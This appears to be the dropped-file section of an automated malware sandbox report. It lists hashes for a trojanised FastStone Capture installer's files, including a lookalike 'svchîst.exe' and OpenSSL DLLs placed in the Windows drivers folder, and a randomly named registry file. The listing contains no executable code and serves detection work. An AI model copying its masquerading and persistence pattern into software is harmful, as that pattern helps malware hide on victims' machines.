SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

memory/1000-79-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\nsExec.dll

MD5 f27689c513e7d12c7c974d5f8ef710d6
SHA1 e305f2a2898d765a64c82c449dfb528665b4a892
SHA256 1f18f4126124b0551f3dbcd0fec7f34026f930ca509f04435657cedc32ae8c47
SHA512 734e9f3989ee47a86bee16838df7a09353c7fe085a09d77e70d281b21c5477b0b061616e72e8ac8fcb3dda1df0d5152f54dcc4c5a77f90fbf0f857557bf02fbc

memory/1072-83-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

MD5 8708699d2c73bed30a0a08d80f96d6d7
SHA1 684cb9d317146553e8c5269c8afb1539565f4f78
SHA256 a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f
SHA512 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

memory/640-85-0x0000000000000000-mapping.dmp

memory/884-86-0x0000000000000000-mapping.dmp

memory/1456-88-0x0000000000000000-mapping.dmp

memory/1688-87-0x0000000000000000-mapping.dmp

memory/112-89-0x0000000000000000-mapping.dmp

memory/1752-92-0x0000000000000000-mapping.dmp

memory/1272-93-0x0000000000000000-mapping.dmp

memory/1576-91-0x0000000000000000-mapping.dmp

memory/1528-90-0x0000000000000000-mapping.dmp

\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\nsProcess.dll

MD5 f0438a894f3a7e01a4aae8d1b5dd0289
SHA1 b058e3fcfb7b550041da16bf10d8837024c38bf6
SHA256 30c6c3dd3cc7fcea6e6081ce821adc7b2888542dae30bf00e881c0a105eb4d11
SHA512 f91fcea19cbddf8086affcb63fe599dc2b36351fc81ac144f58a80a524043ddeaa3943f36c86ebae45dd82e8faf622ea7b7c9b776e74c54b93df2963cfe66cc7

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

memory/688-108-0x0000000000000000-mapping.dmp

memory/1332-109-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

memory/2040-114-0x0000000000000000-mapping.dmp

memory/588-118-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\FastStone Capture\FSCapture.ENU

MD5 a34680a3a79746aa2851f53ee970fed9
SHA1 88b31d3753012e3c8ed3806aa9fb45bb39091584
SHA256 9942d2e76602e3c3ffd2f2a6a124d2f768a361e46ba28f407604e77742ebc9dd
SHA512 cd0334613f0044aae24fb76812752e2e5c94a330d689230adedd2b625db4abedc57a8d216720b7c21784926df7e88cb891883671318f6001951946f418196ea7

\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

memory/1536-112-0x0000000000000000-mapping.dmp

C:\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

\Program Files (x86)\FastStone Capture\FSCapture.exe

MD5 1eceb7f17d041444ea91fcb5a3272c3e
SHA1 33e3ac0adbdd4490f333ee2a844027a4a7d8b19f
SHA256 d6640edb56e4052c3f2de0f396c7b71fe0b478419ae54de7bfcfb72198bf8929
SHA512 6e5d0f98967ef9cbc9abd349304667573840f61dc4cc4281313268198836043fc7555a902baeee34d9dfe767ec252e3c7687c3beb2065a2b396f19cade32ec2d

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

\Users\Admin\AppData\Local\Temp\nsy5718.tmp\System.dll

MD5 8cf2ac271d7679b1d68eefc1ae0c5618
SHA1 7cc1caaa747ee16dc894a600a4256f64fa65a9b8
SHA256 6950991102462d84fdc0e3b0ae30c95af8c192f77ce3d78e8d54e6b22f7c09ba
SHA512 ce828fb9ecd7655cc4c974f78f209d3326ba71ced60171a45a437fc3fff3bd0d69a0997adaca29265c7b5419bdea2b17f8cc8ceae1b8ce6b22b7ed9120bb5ad3

memory/664-119-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\FastStone\FSC\fsc.db

MD5 a979f58d3ece3f44d6572a44efb4a0cc
SHA1 2ac4dbb1994f4b3ef9c13445734f9c16843b140b
SHA256 9ebc76ead646faf16af6605a7d7a8a5c5a3ccf9b9e2ca6628381a5da2b26a87e
SHA512 9bbe07357c6ec4e7eb66acb4b068e1dccd4d73b7fd88d07a4c664ea4501bf3e581bdfe3a221a187ef242570a8733eef5b5227c14f365b1fd79a4f40a17c1c471

memory/1576-121-0x0000000000000000-mapping.dmp

memory/976-122-0x0000000000000000-mapping.dmp

memory/1784-124-0x0000000000000000-mapping.dmp

memory/1484-123-0x0000000000000000-mapping.dmp

\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/1156-127-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/1388-135-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/972-141-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

memory/1940-150-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\idfgvgjnghcdfb.reg

MD5 7b5e1d30e89e0ef1c86fecb977131673
SHA1 78df83f3256df2efbe483d182d4cc13afe99be2b
SHA256 b114302cfede0f574362385c4949dde34c544b5213a239908299588f00b0bd80
SHA512 eae8f24f30b8dac2d0944fb702aca9c6ca30a5d3ffb6a4191afec47af1f59a50bbaa00d11b07976f485c58839f1927695655a69ff81807ca123026dd2e84b719

memory/1120-152-0x0000000000000000-mapping.dmp

memory/944-153-0x0000000000000000-mapping.dmp

memory/328-154-0x0000000000000000-mapping.dmp

memory/1664-155-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb